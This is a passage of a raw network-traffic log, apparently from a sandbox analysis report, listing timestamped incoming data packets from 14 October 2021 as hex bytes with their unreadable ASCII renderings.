xNvu3fQ\|!Vt<*~eaZ=t9C!lsg9V0qjNFZcTS89;_ZIkk~+gw0RS\pyeQ6XYK"ij?%J4EtIg,!cwg974UiJ5ob\|kr,x8Q(k
2021-10-14 02:15:48 UTC	188	IN	Data Raw: 0b f3 c7 6f 19 1f 12 8c ea 9f 8a 7e 88 0b 89 0f 2e d1 86 7a eb 3c e8 a2 0c a9 62 b2 e4 31 d7 bb 7d 35 23 25 63 27 53 26 cb 3e d8 bb fd 60 90 3f 8d 21 93 44 2c ad 6d 90 f6 67 34 b4 0c 1e 31 ee 15 fa eb 85 90 61 22 5a 81 95 20 51 52 df cd f9 33 1c 2a e2 f3 f1 fe a6 57 b2 67 b4 09 3b e5 bc c7 98 a8 a4 93 a3 a4 bf 1f 3a 8e eb 9d a4 1b 7f 3f 7f e0 23 f9 04 ca bf fd a6 ca 70 98 0c b5 56 a8 ab c4 6e fd 71 da 1d 56 c3 2c 57 2e 4e 27 27 3c 23 a8 1e 7f 69 0c 60 b3 d0 ea 29 35 42 70 8a 3d 41 f0 24 00 f8 1e ff 8c 83 c9 e7 02 4c c4 ad 8b 40 08 6f 2f 91 44 95 7d 6f 2f 6f 2e 38 7a cd f2 4a 4f ba 7c 77 3a fb a8 a0 46 23 9b 0e f3 37 61 52 fa 06 c3 91 5e 37 a7 01 eb 76 8e 9c 1c 04 53 3f fc 61 ad 18 eb 8f 6c dc e7 d0 c1 c0 56 c4 c5 70 eb 35 5a 90 55 c2 57 76 23 5f 9f 25 3c Data Ascii: o~.z<b1}5#%c'S&>`?!D,mg41a"Z QR3*Wg;:?#pVnqV,W.N''<#i`)5Bp=A$L@o/D}o/o.8zJO\|w:F#7aR^7vS?alVp5ZUWv#_%<
2021-10-14 02:15:48 UTC	189	IN	Data Raw: dc ae 55 13 aa 59 c1 30 09 41 56 f0 f4 5a e2 30 e6 99 f0 88 d1 a5 60 10 ed 07 03 0c 04 da 6a 2e 3b 79 35 61 5c a7 db 72 e5 f4 ea dd de 70 0f 49 b9 e1 22 22 30 2c 64 a4 21 27 ac 91 9e f1 5c 44 7a 65 69 b6 63 3c 87 5c 76 52 26 6a cd df 6a 24 43 56 77 5f 36 2f 99 41 d0 75 8c a9 af 3f 93 86 98 40 c5 1f f1 f1 b4 fb 22 34 38 a4 9c cf 28 95 ea 23 09 25 39 af 78 f6 48 ec 8d 70 88 66 a2 72 94 82 8b a4 55 b1 38 83 f0 f6 83 c2 44 ec 65 51 e7 60 51 bb a8 b4 4f f3 58 2a d6 25 0a a6 a4 84 c9 3a a5 bc 39 e6 db 8c b4 67 1b 37 08 62 fa ac 79 2f ed 16 bf 2b 08 d8 12 73 b8 c8 48 fa fd 9d 90 9e 3e eb 98 16 ca 30 dd 1d c1 7f b3 f9 4d 37 1f bc 15 f1 ca ed 71 cf 2d 0e 46 d3 79 bb 45 5f 53 81 f4 a3 1c 90 4b 08 0a b2 bc e2 2d 23 bf 75 40 fc 82 98 37 c0 7d bc 28 58 5b a6 f1 3f de Data Ascii: UY0AVZ0`j.;y5a\rpI""0,d!'\Dzeic<\vR&jj$CVw_6/Au?@"48(#%9xHpfrU8DeQ`QOX*%:9g7by/+sH>0M7q-FyE_SK-#u@7}(X[?
2021-10-14 02:15:48 UTC	191	IN	Data Raw: 11 f0 0d c2 7f 61 59 f8 58 a0 4c ce e6 c0 e3 eb 47 71 7b 85 cc 91 55 89 7d c0 37 d2 00 d9 e6 aa 7f 9c 82 1d 4e 99 2c 60 1f d0 34 ca b0 1d 5f 10 92 ec b9 57 57 e3 f8 81 66 ff 86 9c 80 71 64 cc e9 67 1a 42 33 d1 7a 87 02 6e b5 5f 5d ce 22 d3 b7 9b bf bc 5f 30 c3 cb 1b b5 f5 83 c2 7f 89 55 b4 e1 0a 08 fc f9 e8 8c 99 bb d8 38 6d 30 f4 84 78 86 2f e5 e8 35 97 c3 10 b2 c0 43 7e 8e 72 24 25 1b 77 b1 73 25 a8 e6 10 48 5e 63 fa d2 69 91 2b df a6 c2 39 9b a5 9d dd 05 a1 8b da 26 5a 83 59 2b 39 e4 1c d1 bb db 18 ce a2 90 ed f5 d0 58 a0 22 1b 15 23 3f 72 3b 98 d5 a1 33 27 6a 41 62 fa 9d d2 e0 13 aa dd d3 c9 7b 7f de a8 c7 92 6f b7 3b 3c 58 70 66 0b 83 94 aa e1 3a 20 9f a0 64 a8 21 d7 99 6c 96 36 0d 50 f4 78 50 ac 68 cf 34 7c 49 a6 e4 80 80 3c fa 09 45 49 90 2f fb 87 Data Ascii: aYXLGq{U}7N,`4_WWfqdgB3zn_]"_0U8m0x/5C~r$%ws%H^ci+9&ZY+9X"#?r;3'jAb{o;<Xpf: d!l6PxPh4\|I<EI/
2021-10-14 02:15:48 UTC	192	IN	Data Raw: b4 9b bb 28 de f8 70 aa ea e8 78 b5 f1 ad 8c 7a e7 65 9d 4c 1f e9 8b 51 1a 03 58 0a dd 5e 27 70 7c 3b 39 e9 8b c9 27 94 59 01 c4 2c 40 a7 60 eb b9 5a 08 44 f9 ed 43 9f b4 83 40 04 b0 42 55 5d f1 aa 22 95 d7 1d 73 46 fe 91 5b 59 f0 1d 0b 5f 55 71 5d af 96 43 f8 6b e0 bf 9c b0 e1 0c 7d 20 9c 93 ef 70 d0 dd 98 f4 8b be 2c 2a 21 e4 cb 83 cd 6a 3f 90 b1 0c 4e 15 b2 83 17 44 ce 77 f1 5f a4 26 dc 8f e0 78 90 98 2f 85 a7 08 f0 c2 e0 f0 70 ed f1 be 35 d8 55 09 71 d4 42 4a 19 1c bd 6b 17 54 d0 88 63 81 77 be 3b ac f0 a6 b5 11 da 52 f1 dd b7 c4 59 20 df 72 58 ff 9d 22 a9 bb b5 57 17 1a 9a e7 54 49 51 0a 5d e1 4b e6 66 b0 50 ea 25 f1 5b fe f4 39 5b bc ee b0 22 e5 a7 a2 d7 e8 c7 22 8f fd f4 6d eb ee 99 8c a2 1b 91 b4 ea 8f 3f f6 9d 1d 88 f6 26 43 1a 05 ef 51 37 05 d2 Data Ascii: (pxzeLQX^'p\|;9'Y,@`ZDC@BU]"sF[Y_Uq]Ck} p,*!j?NDw_&x/p5UqBJkTcw;RY rX"WTIQ]KfP%[9[""m?&CQ7
2021-10-14 02:15:48 UTC	193	IN	Data Raw: 52 bc 8f 4e ea 7a 35 2b e8 b1 ea dd 02 5b d4 30 ee 58 33 55 79 e7 23 74 92 38 ba 5b ea fe 01 f0 61 b8 3d 8c eb 87 76 ac 6b 0c 20 09 bb d4 23 54 60 7f b1 3a 4f 06 18 e6 3a 26 3f 76 78 eb 20 ae ff aa 2a 10 0b cb 98 18 6e 58 7d 35 2e df 70 2c 81 cc 25 de d9 b4 34 50 30 0f c0 91 be a4 8f d7 94 4e 0e b4 82 51 e6 63 e5 50 04 c2 6c 37 c0 b0 d5 d0 73 b5 36 99 49 cc 5d b9 c2 ba d1 49 fe c5 8f 1f 89 d5 90 c0 33 8e 69 96 f2 08 21 fa 0d e6 32 b3 02 d0 ef 7f 93 f5 3d 6b 85 31 20 c1 71 83 cc 15 30 c5 07 69 fa 4f fe 23 57 61 6e 52 0b ab ef 69 c2 60 aa d0 86 16 ad 1d 1f ac 8e 47 94 be 1f d8 0c bb e8 df fb 73 df 47 f5 02 ca 1f 8d 9a b0 15 a8 a5 cc cd fb cf da a5 7e 38 28 1f 2c 73 02 b8 39 93 a8 0c 53 66 07 f7 b3 d2 d9 35 3e d5 70 e2 27 58 fb 90 00 94 0b 91 8c 0f c8 72 02 Data Ascii: RNz5+[0X3Uy#t8[a=vk #T`:O:&?vx *nX}5.p,%4P0NQcPl7s6I]I3i!2=k1 q0iO#WanRi`GsG~8(,s9Sf5>p'Xr
2021-10-14 02:15:48 UTC	194	IN	Data Raw: b7 d2 90 2e c3 4f 1d 35 7c 94 02 de 40 0a 80 0f 4b a3 f6 86 6e fa 91 84 e1 ef 68 2d 05 d6 a8 56 1a ea a9 76 23 f7 05 48 2d 1e b4 37 c8 61 e2 55 c5 5b 78 60 39 c6 f1 4e 52 f8 d8 27 d5 5b 9e fa 9e ec a3 8e 50 85 9c 56 2a 08 54 59 80 1b 3a 52 0f f5 a9 b0 ea 7f c3 6c bd 1d 73 55 85 e0 25 ec 19 bf 9a af 65 20 c5 13 dd 28 7f 2a 98 bc b8 22 fb 45 00 74 ff 8f f5 1d 9a 25 8a 29 84 c3 be d1 ce 17 f1 42 9b 89 18 30 29 2c d4 41 91 08 9a 0e 3d dc d4 78 bc fb 99 da bb 02 2b 90 8b 5a 1f 41 5b 94 c1 73 88 77 55 47 48 59 4e e6 21 da 06 ab dd 49 e9 31 54 1d a4 9e 87 07 a3 1a 04 41 09 e5 7b e1 42 b2 7e e7 4b 3e cc 4f e1 60 47 7a 6c 34 ec 90 52 35 6f 0e 18 3a 0d f6 fd 55 48 5a 95 58 79 17 3f 1f 0c a0 06 72 a0 f0 49 c9 a1 35 85 4c 44 81 f7 e5 55 73 9a 03 8d ee 43 de cb 4d 20 Data Ascii: .O5\|@Knh-Vv#H-7aU[x`9NR'[PVTY:RlsU%e ("Et%)B0),A=x+ZA[swUGHYN!I1TA{B~K>O`Gzl4R5o:UHZXy?rI5LDUsCM
2021-10-14 02:15:48 UTC	195	IN	Data Raw: 99 1b 22 b5 6b cb 55 0f db c2 30 ec a2 15 f7 46 2d 22 88 50 b4 c2 1d 50 89 1f 86 aa 8f 12 18 20 24 c2 8b ee 9b 49 bd aa 07 74 b8 c8 ab 1d 71 25 cf 75 80 31 36 24 2b 98 61 1a 66 da f4 00 71 b9 be 19 a9 f6 63 c8 56 e9 d8 59 95 2d c7 63 ce a0 03 98 08 5d d4 98 ea 3e b0 b1 69 2b 95 2c 4e 5a 24 cc 8e 3e 02 8b 02 9a ff 72 e4 ad 3a 2b c6 c1 ef 12 45 ea 9e ed 0d 6a 81 6c f1 67 90 12 6d bd 2d 5b 27 13 3f ce dc 49 5b c1 84 50 e6 1b b7 11 76 5e 17 33 80 0b bc 5e 5f 25 68 43 f8 f3 12 70 89 96 61 cc 54 35 c5 b6 9c 6a d3 4f 93 c8 02 78 bc d1 6e 2e 01 2c 54 62 8b 36 8c 22 ff d0 cf d4 9c 0e 1a bc ea 7f 22 1b b9 98 e0 34 d9 20 df 4d 1f b9 ca 4c 5e 01 58 5c 9c 43 61 72 7c 67 78 c5 c3 c1 27 86 18 da a6 0e 40 df 21 c7 dd 78 08 10 9c 84 0e 99 d0 85 2c 95 f6 ab 39 13 bf 8e 4f Data Ascii: "kU0F-"PP $Itq%u16$+afqcVY-c]>i+,NZ$>r:+Ejlgm-['?I[Pv^3^_%hCpaT5jOxn.,Tb6""4 ML^X\Car\|gx'@!x,9O
2021-10-14 02:15:48 UTC	196	IN	Data Raw: c4 a2 78 c6 9f 8e 9f 3f b0 ca c6 e5 e6 26 04 4c 1e af 42 37 87 87 72 77 7b 64 19 e3 7f f9 12 2d 15 76 f3 ef 4b e2 2d f0 79 e9 f4 c6 2c b0 db 68 1b 35 c3 02 4d 17 7b e2 5b 4b 38 a1 f5 0a ad 91 18 b6 9c 0e 79 05 4b ff 23 58 bc a9 ce 75 82 41 1d 2d a7 e2 40 8e 37 e2 ef 93 2c 30 35 39 59 a7 37 30 ae d8 bb 83 22 fa af 9e aa f6 f5 36 d3 9c 15 7f 73 17 33 f2 69 38 62 60 82 cc d0 81 6e a6 2b c5 6d 71 68 dd e1 66 9c 1b 84 c2 ad 20 51 c7 d4 85 29 38 58 9a 75 e0 38 9a 45 02 5d a3 94 96 cb 98 0a d6 18 e1 a5 bd 02 92 26 96 5a 98 7c 45 01 6a 37 d7 bc cc 39 df 13 3e 21 89 4c fb d6 9a ae e1 3b 4a b1 88 97 46 0c 38 8d c5 b8 d1 2e 30 20 51 4d 17 8c 5f e3 1f a0 9e 1f b3 3b 54 6a e7 f4 c2 2c a3 24 5e 3e 4e e1 7a 43 19 43 1e eb 4d 02 90 05 85 60 40 7f 31 5b 8e 7a 55 82 32 24 Data Ascii: x?&LB7rw{d-vK-y,h5M{[K8yK#XuA-@7,059Y70"6s3i8b`n+mqhf Q)8Xu8E]&Z\|Ej79>!L;JF8.0 QM_;Tj,$^>NzCCM`@1[zU2$
2021-10-14 02:15:48 UTC	198	IN	Data Raw: 89 c1 9e b6 74 5a ce 28 8d 4b 30 95 e9 65 95 6c d3 f9 4d 9d 1e 6b 69 a1 c0 ea e5 5c 41 51 d7 02 c0 3f 96 45 3a 43 53 02 04 96 02 28 e9 3d ae 3e 23 da f8 30 f8 e5 72 99 62 27 2e 9e 5a c7 fb 1a 51 cb 3c a9 b6 d9 45 18 32 32 d3 a6 a8 da 2c bc aa 16 71 9f e0 b1 0c 04 78 a3 45 8a 16 2b 38 3a ce 53 69 51 cb ca 11 4b b2 99 4f eb 97 45 c6 6b e2 ea 05 cb 49 e9 74 e3 84 07 91 7d 5e e1 f9 c5 3e bf ee 20 02 9d 28 5f 33 18 c7 81 28 36 8e 43 e9 c7 75 b2 ad 23 25 fa e4 cc 03 00 ad ff d8 0d 0b a4 41 fb 41 c7 48 0a 8c 42 51 3b 02 6d 9f b2 70 76 95 e8 41 e2 19 bb 21 3f 75 0d 66 ff 65 9e 5e 61 09 06 75 ac a2 7b 4c a5 99 73 ea 51 24 f4 c7 f9 4a f9 68 8b d5 41 21 d2 f4 46 01 36 29 7d 51 d0 62 d8 4e fd b5 f2 ce a7 2f 31 e1 98 22 0d 18 b8 ed c5 15 8e 53 ed 63 6c 9b e9 20 7f 40 Data Ascii: tZ(K0elMki\AQ?E:CS(=>#0rb'.ZQ<E22,qxE+8:SiQKOEkIt}^> (_3(6Cu#%AAHBQ;mpvA!?ufe^au{LsQ$JhA!F6)}QbN/1"Scl @
2021-10-14 02:15:48 UTC	199	IN	Data Raw: 78 19 f0 a9 20 58 28 fa 39 ca 38 c6 12 4f 12 ae 4b c0 3e 50 81 46 22 89 8b 70 65 9f cb da 84 60 a7 7b ea b8 b7 02 84 8d f8 e3 c7 1b c3 eb 98 9e 50 86 eb b4 f6 d0 52 16 6b 7b ed 73 52 b0 8e 3b 5d 5b 05 2e dc 1e d1 30 6e 27 4c 87 d2 6f 87 4a f2 68 c2 e2 d3 59 b1 cc 79 2a 08 d6 77 40 35 0e f2 68 4b 18 96 85 1a 8e e3 18 e0 dd 18 5f 69 45 ca 42 6e 82 c6 e3 60 e3 76 2f 2d ac d4 2d ad 2f 80 c2 a1 4f 0c 21 56 54 9c 52 31 8d b1 b7 ba 60 ff 8b fb cf e9 81 24 f4 cb 17 4a 21 31 28 f0 51 56 5c 6a f4 ee f3 9c 50 a6 1d cd 55 1f 59 e0 e1 66 a8 74 b3 ff ad 21 60 b4 e2 b2 5a 1a 00 ce 4f c1 68 9a 6f 71 5a fb c6 90 e5 fd 1c fd 7d 84 be cf 01 ab 52 94 02 d5 4b 70 75 40 0d b6 8b e1 7d ff 26 5b 00 b1 38 d9 8f dd 83 cc 70 4e 91 ea 9a 7e 7e 3f 87 b1 bd fc 4b 55 3c 35 42 3a e3 4a Data Ascii: x X(98OK>PF"pe`{PRk{sR;][.0n'LoJhYy*w@5hK_iEBn`v/--/O!VTR1`$J!1(QV\jPUYft!`ZOhoqZ}RKpu@}&[8pN~~?KU<5B:J
2021-10-14 02:15:48 UTC	200	IN	Data Raw: 78 da 42 c0 9e 86 9a 06 ba 1a 9d 79 ae 74 e3 dd b1 57 fc e2 f4 a9 94 bb b5 c3 17 74 4e 06 6b 17 76 de 56 e9 c7 6a 3a 2c 61 ec e0 aa aa 64 5a a3 5e a4 55 1f 8d e4 6e f2 25 ff e0 73 af 19 6c 6d ce e2 fd 8a 56 66 44 fb 25 9f 6c 80 5f 2c 43 5c 0b 51 ac 04 09 e7 2a ae 08 5e fa d8 27 e9 ff 40 f7 4e 37 22 9b 4f a2 e9 1a 50 c6 1b 9b b6 d5 4e 7f 55 02 c9 9c ae ca 28 9f aa 22 71 99 e0 96 1d 30 7e a1 46 ef 20 10 3d 31 c7 3c 7b 50 ec e1 16 51 b9 ad 2a dc 93 43 f7 6d ee da 0b d3 48 dc 74 d8 90 0b 98 18 6b f0 8b ea 22 b7 83 2a 00 91 3f 5b 41 2e f1 9b 3e 12 85 57 9a f2 7d 84 d9 1c 2d fd ef 81 21 16 aa cd cb 1a 62 8b 42 9f 40 d3 44 1e 9d 30 7b 27 00 09 a9 a5 77 6b 91 e9 2c c7 08 b2 33 56 5e 04 02 e2 64 bd 7d 65 02 61 37 9d aa 5e 4d 82 90 05 e2 5f 35 ab e5 f2 5f de 6a 98 Data Ascii: xBytWtNkvVj:,adZ^Un%slmVfD%l_,C\Q^'@N7"OPNU("q0~F =1<{PQCmHtk"*?[A.>W}-!bB@D0{'wk,3V^d}ea7^M_5_j
2021-10-14 02:15:48 UTC	201	IN	Data Raw: 09 36 96 2e 6a 4a 68 ce 1d 76 24 d0 cf 07 e6 28 e1 5a ff 94 de c1 26 bf 73 9d f6 f0 e4 2d 32 bb 12 28 8d f3 31 cd fb c1 38 72 1b f6 cc 10 69 37 e6 3d be 2e f0 12 62 34 a0 48 b4 3c 5b 81 4d 1e 97 8a 3f 45 a5 d3 cd b2 69 ab 09 cc ca 8d 1d 9d 92 ca e5 d0 7e f2 f2 ea 8d 5a a1 cd a3 f2 c6 43 10 6d 4d 99 66 52 a5 bc 72 7e 48 09 33 c7 06 ec 30 5f 37 41 9e a7 7a 87 3e ca 41 e6 dc e2 4d ae be 7b 21 08 ca 55 7c 20 09 e1 60 4b 3c 92 81 31 ab f0 0f 81 f1 68 4d 68 2c ca 4e 1a 8f c4 8d 45 e7 71 15 64 96 d0 2d c8 13 87 dc 9b 65 0c 07 54 38 a6 56 27 95 ac 9f b1 56 d7 8c fb a2 a1 92 35 f0 c3 34 41 1f 31 08 f9 4d 4c 4a 62 f4 e6 e6 8d 70 a2 1a d4 54 16 79 fc 92 51 a1 76 c0 fc c0 65 6e aa 92 8e 50 12 6d ff 49 ca 51 98 5c 6e 58 94 e6 9c e7 f0 03 8e 50 e5 8e d5 25 a6 41 9e 70 Data Ascii: 6.jJhv$(Z&s-2(18ri7=.b4H<[M?Ei~ZCmMfRr~H30_7Az>AM{!U\| `K<1hMh,NEqd-eT8V'V54A1MLJbpTyQvenPmIQ\nXP%Ap
2021-10-14 02:15:48 UTC	203	IN	Data Raw: b2 45 1c e0 4c 54 a9 1e f8 cc 4b 5f a4 6c 1a 8e 05 86 41 32 06 1a 34 64 c7 ef 55 b0 16 df bf e3 06 d9 4b 67 ce eb 48 e0 c4 70 b4 0c c2 8c be a4 36 ba 2b 97 65 a3 6d f9 d3 de 6c a8 d7 a9 98 a5 9c bf d4 1d 68 40 76 58 1b 6d f5 38 ed cd 7a 0c 11 72 8d c7 a6 aa 54 5a bd 13 92 4e 0e 8e e4 6f fb 0b e5 f4 61 bc 15 6f 24 9c d1 e1 91 52 49 40 a6 03 c6 36 a0 5f 2c 4b 5b 02 34 9c 2e 33 e3 3a be 4a 03 c6 c2 55 c5 ff 51 9e 79 2b 2f fa 6c b3 df 12 4a c0 0b 80 a9 cc 41 6a 3c 24 c8 97 dd fb 3c 81 cf 01 75 99 de 86 1d 30 7b 84 44 96 20 10 3d 31 ab 34 7f 40 e0 c6 0c 51 b1 be 61 fe 8f 73 c8 68 e9 ac 0d c2 59 d3 47 db 82 29 91 04 7c eb 8e ed 4c 83 ec 0a 04 99 3b 69 5b 3e d6 8b 23 0c 85 30 d8 c9 12 94 c2 6e 00 fc 88 c4 09 73 98 f1 bf 2f 64 e5 6d f0 13 e5 49 00 99 23 60 2c 33 Data Ascii: ELTK_lA24dUKgHp6+emlh@vXm8zrTZNoao$RI@6_,K[4.3:JUQy+/lJAj<$<u0{D =14@QashYG)\|L;i[>#0ns/dmI#`,3
2021-10-14 02:15:48 UTC	204	IN	Data Raw: aa fd a8 03 5a 41 b1 8a 20 08 dc 27 72 1d 9e 53 83 fd c9 a0 a8 e9 90 bb d5 e5 5b fd d5 e8 b2 80 94 f6 1f 60 87 58 47 e9 30 7b 70 bd 2b 61 78 6e c5 3e 78 3b bd c9 16 e6 12 d1 3b eb 94 f9 ea 17 b5 7f 80 83 c3 e4 2b 60 8d 04 2a 94 f8 30 eb c7 d8 3a 62 0e fe be 54 6b 34 fe 03 8e 25 d0 34 75 22 ae 49 c2 3e 4c f5 61 3e 8d b1 34 4d 85 f5 da a4 67 aa 7f ea ca f4 3e 8c 89 da fd cb 6b f1 f0 8b b8 5b 83 f6 a3 f4 d6 54 63 4d 71 a1 7b 40 a1 a3 72 55 5f 64 3b c7 7f fc 2c 5f 52 64 9a d5 1d a4 26 fa 62 c4 bd d3 5e a6 df 68 21 2c e7 6d 46 24 18 f4 48 39 29 98 87 6e b8 fd 18 81 ee 38 5d 6a 46 cc 40 6e ae db ff 4d f0 05 19 48 96 e5 32 a7 0a 87 cb b0 69 0a 10 56 4a f0 64 3d 9a b3 bd a0 67 ec 8a f1 bd a1 92 35 f0 c3 3c 5d 1e 36 3e f2 7a 5d 4c 66 99 c8 fa bb 67 b3 0f cf 5b 05 Data Ascii: ZA 'rS[`XG0{p+axn>x;;+`*0:bTk4%4u"I>La>4Mg>k[TcMq{@rU_d;,_Rd&b^h!,mF$H9)n8]jF@nMH2iVJd=g5<]6>z]Lfg[
2021-10-14 02:15:48 UTC	205	IN	Data Raw: ae 0b d6 41 04 c6 42 3b 07 20 07 de ba ca ff 18 9b a0 fa 76 e8 a2 d5 ba 43 fa 0c e2 81 63 4e 93 7e ef 55 d4 76 80 a6 1a f0 9b 48 1b e0 75 4e 87 1d f9 ae 79 5c 88 77 1a 88 21 8a 4b 38 18 1d 5d 78 cc 9b 4b 8b 1f c9 be f3 0c c8 47 71 ea e2 57 f6 cc 73 95 7c c0 9b ab 8f 1b b0 36 87 17 99 64 fe ce d4 6f 86 e7 a3 80 96 bd b9 d3 17 75 47 75 2c 01 67 ef 67 c7 c9 76 3a 2f 73 81 f2 a6 ad 7f 52 af 04 89 44 2c 9f e9 69 e7 6e d5 f9 7b a7 1e 71 0a 9d d0 fd 8c 55 43 76 f8 2c c0 2c 9c 5b 2a 43 5d 02 22 f8 39 2e e1 3c b3 71 1a dd c5 3a ee e2 27 90 6e 30 1e bd 4d a8 d8 0b 57 a7 2f 8a b0 e3 63 70 34 25 d4 f9 9a cc 3d ac a7 07 62 9e 81 82 0c 36 5e a2 40 88 01 3a 24 3c c4 37 7f 46 cc 95 37 41 a4 be 4f f6 d8 63 ce 72 e2 de 19 a7 7f f9 68 c3 9f 0f 91 35 5d e8 89 e6 3e a3 83 0e Data Ascii: AB; vCcN~UvHuNy\w!K8]xKGqWs\|6douGu,ggv:/sRD,in{qUCv,,[*C]"9.<q:'n0MW/cp4%=b6^@:$<7F7AOcrh5]>
2021-10-14 02:15:48 UTC	207	IN	Data Raw: 63 00 1f 92 66 5b 6f 83 3f 49 b3 2d a0 38 99 e3 a6 8c 18 93 dc e9 4f b4 54 18 17 dd 55 8a d5 a4 98 cf 30 e9 2e 40 06 44 29 bf 90 9e 1a 4b 43 f2 a3 27 0e dd 37 17 3c b7 41 85 f9 c9 eb 91 ed 8c da f7 ee 42 fd c9 9c f0 b1 8d d9 35 62 94 50 50 f3 21 09 31 8b 36 6e 7a 74 d1 1d 79 3d d0 ed 0c e4 1e d1 54 e2 9c e8 db 20 da 4a 9d 9a f3 ee 3a 15 b3 04 36 96 9d 25 cd dc ea 1a 76 08 fe a2 20 0c 16 ef 28 9a 2a d1 03 7e 25 c1 42 d1 2f 61 b6 67 29 8b 8b 1e 57 f6 ee ef 92 66 a2 59 e0 d1 9a 19 e9 9a fc e5 fd 57 fc fc 8b a6 7a bb fb 96 ec da 48 17 19 79 88 60 68 87 be 07 5d 59 64 3b d0 0b e0 10 44 31 4b b0 c8 68 8c 3e 95 4a d3 c9 d3 44 a2 cc 5f 2b 09 fb 76 2c 04 15 e4 4c 28 38 92 85 1a fb d3 18 87 f5 06 6e 66 4f cc 53 6e eb eb ce 50 fb 75 3e 69 87 d6 32 b1 10 96 a8 86 6f Data Ascii: cf[o?I-8OTU0.@D)KC'7<AB5bPP!16nzty=T J:6%v (*~%B/ag)WfYWzHy`h]Yd;D1Kh>JD_+v,L(8nfOSnPu>i2o
2021-10-14 02:15:48 UTC	208	IN	Data Raw: 7e c0 82 23 35 53 d6 44 08 2c 5e e8 6c 71 3c 87 c6 4d 2d 6f da 8e e3 df 20 e1 9b 8a 29 6b f5 d0 d2 9b 10 80 86 6f 6c 1b 37 87 1d a2 57 05 d0 55 2b 1e 67 3d dc 83 cd a2 2f 93 a5 e3 63 89 b7 f5 b6 6c c9 0d f5 80 6f 52 8e 4b 8e 5f d8 6e a6 ef 39 e6 9b 49 16 f5 50 59 c0 30 f8 b5 18 72 ab 68 1c 91 03 91 52 2e 76 3d 24 78 dd 8a 79 ec 23 df bc f2 01 c0 6b 31 fe eb 4a fd cc 73 b3 76 c4 9d a3 94 1c f1 1e 9b 65 a7 7c f9 ce d4 70 db 8a 8e 85 94 b9 a8 de 7e 7d 4c 72 73 26 6d ef 59 e6 f8 66 2a 31 6f 8f d2 bf 94 75 52 a1 02 99 27 3d 88 e8 61 e1 6e f2 e4 60 ad 13 76 65 bc dd 8f 82 5e 50 7a da 25 ce 31 a0 5f 2c 53 32 0b 34 8c 34 08 e7 29 aa 5d 03 dd d5 55 d1 e4 46 9b 62 30 38 fa 50 b7 f2 3e 55 d2 29 83 ad c8 59 18 3a 27 f8 b0 b3 cc 38 9a ae 0a 79 99 f8 c5 0e 27 63 90 51 Data Ascii: ~#5SD,^lq<M-o )kol7WU+g=/cloRK_n9IPY0rhR.v=$xy#k1Jsve\|p~}Lrs&mYf*1ouR'=an`ve^Pz%1_,S244)]UFb08P>U)Y:'8y'cQ
2021-10-14 02:15:48 UTC	209	IN	Data Raw: db 63 26 32 6e a0 bc c1 ab 81 26 ea 5f da c7 47 4e b2 62 c3 b9 38 0a 59 ff f0 42 e4 34 61 4e f5 b0 c2 48 64 94 ea 02 16 c5 86 ee 6f fe 13 5a 30 99 5c 0b dd 54 fc 5b ea 95 cb f6 16 e2 be 9d 12 e0 29 6c e5 39 31 e9 a9 bd 9e b8 57 99 00 22 6d 24 67 c9 91 c3 6b 3b 33 b0 c7 40 6d b4 40 0b 62 df 16 f5 9c a5 cb d5 89 e2 bb 82 0b ee 9d 87 e8 e2 69 25 b1 70 0f fc 33 36 9d 55 15 60 f8 44 01 0b 9c 71 6a 97 98 c2 28 b7 80 f7 7a 35 8a f1 8c a7 d4 07 1c f5 f6 b7 93 d9 85 d8 41 59 e3 8f c2 4d ac 95 4b 16 72 9e ec 54 1e d1 5b 59 ea 4b b1 e6 c5 57 e1 24 b5 49 be 20 01 5c f1 fc f0 ee e4 27 6e c5 88 13 14 8a aa 74 9c e1 e1 91 92 82 1b 99 95 ca c9 3e db 8e 46 76 a2 a6 9a 1d 1e ec 1c 2b c3 f1 71 3b 30 61 54 bd 78 9f 47 2c 4f 25 fb af 18 e2 48 94 03 b8 b8 97 2e d1 e3 14 41 7c Data Ascii: c&2n&_GNb8YB4aNHdoZ0\T[)l91W"m$gk;3@m@bi%p36U`Dqj(z5AYMKrT[YKW$I \'nt>Fv+q;0aTxG,O%H.A\|
2021-10-14 02:15:48 UTC	210	IN	Data Raw: a6 11 83 8c 6b a5 23 9e 01 be ea 70 75 fc 24 96 90 9f 51 cc 9e 75 72 fe 52 26 23 4b a5 f3 50 69 de 3e 87 ba 0f d9 b0 7c 71 8e 8a 85 66 72 d4 82 ae 68 03 f9 39 8d 26 a8 3b 71 f4 4c 0f 5b 52 14 f8 de 14 1f fc 85 1e 91 4f dd 59 23 2d 6d 1f a4 3e ea 33 00 6b 05 25 48 44 00 a2 39 e5 6c 83 3a 43 f5 9d 99 30 a5 01 f1 a0 2f 5b ae 18 ae 6e 5c 7f 00 3f a5 1e a6 3f 84 a8 a7 96 cb 44 5c 8c ed 56 7d f5 4c ec 92 51 e0 35 8f 8d 92 fb 95 4c 1f 60 59 0a dd 4b 21 13 7e 21 31 d6 8b 86 27 e4 5b c6 d8 4d 48 bc 63 db a5 24 14 4a f7 f6 43 f5 a8 ec 5c f2 b4 c2 54 74 ed e9 32 17 d6 18 73 76 ef 02 5a 23 e5 4a 8a 51 54 ec 5d ff 84 4b 75 19 fe b9 1d b0 e6 64 73 70 8e b3 76 ba c5 8a 19 11 88 63 22 6d 2f 49 d7 85 df f6 a6 32 bf c1 5c ea 2e 56 05 ee 57 33 e3 1d e4 cb c9 9e 63 ff 93 85 Data Ascii: k#pu$QurR&#KPi>\|qfrh9&;qL[ROY#-m>3k%HD9l:C0/[n\??D\V}LQ5L`YK!~!1'[MHc$JC\Tt2svZ#JQT]Kudspvc"m/I2\.VW3c
2021-10-14 02:15:48 UTC	211	IN	Data Raw: 00 31 ac 2b 0b 69 98 89 21 e4 05 4a 29 e1 b5 40 c8 69 e5 ad d9 29 65 67 31 30 f8 32 52 fb dd d6 dc 27 9e f9 83 ca af f2 57 87 8d f2 b4 71 5c 46 87 30 25 2a 12 f1 b4 93 f5 07 cd 72 a1 27 74 38 07 f4 37 46 0a dd 99 b0 79 14 db 8f df 2b 79 03 9f 1d b9 36 e6 1e 00 22 fe 92 f5 91 84 72 9c 2d 82 fd bf 79 cf 28 ff 05 9f 3d 01 04 34 6b df f0 95 3b 87 4f 23 62 cd 49 e4 88 b0 f3 aa b9 22 ea 86 fb 0a 1e d9 dd c7 d2 86 26 5d 64 54 36 4b 82 25 bf 17 ea d9 1a ec 7d 46 ac 9c fc 9a 73 be 67 19 3b 01 b3 67 0e 51 c1 6a ac 48 6e d7 00 f4 b8 4d 09 e9 56 f6 25 48 e1 75 21 0d 0e 09 bd eb 43 4a ff 98 3c 6e 